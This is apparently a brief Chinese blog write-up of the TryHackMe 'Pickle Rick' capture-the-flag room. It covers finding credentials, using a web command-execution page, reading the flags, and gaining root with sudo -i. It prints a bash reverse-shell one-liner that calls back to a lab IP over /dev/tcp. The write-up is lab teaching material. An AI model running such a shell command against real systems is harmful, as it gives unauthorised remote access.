[THM]Pickle Rick
一上来就是脑洞
网站首页源码找到用户名
扫目录扫到
/robots.txt给了个字符串,推测是密码
登录成功来到一个执行命令的页面
先看看有啥
第一个flag
1 | tac Sup3rS3cretPickl3Ingred.txt |
1 | cat疑似被过滤 |

第二个flag
谜语人啊,clue.txt说在其他目录能找到,但又没说在哪
弹shell看看
1 | bash -c "bash -i >& /dev/tcp/10.21.170.43/404 0>&1" |

在/home/rick下找到
第三个flag
sudo -i直接提权了
然后在/root下找到
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 lan1ocのblog!





![[记录]尝试shiro有key无链利用,但失败](/img/c1/3.webp)
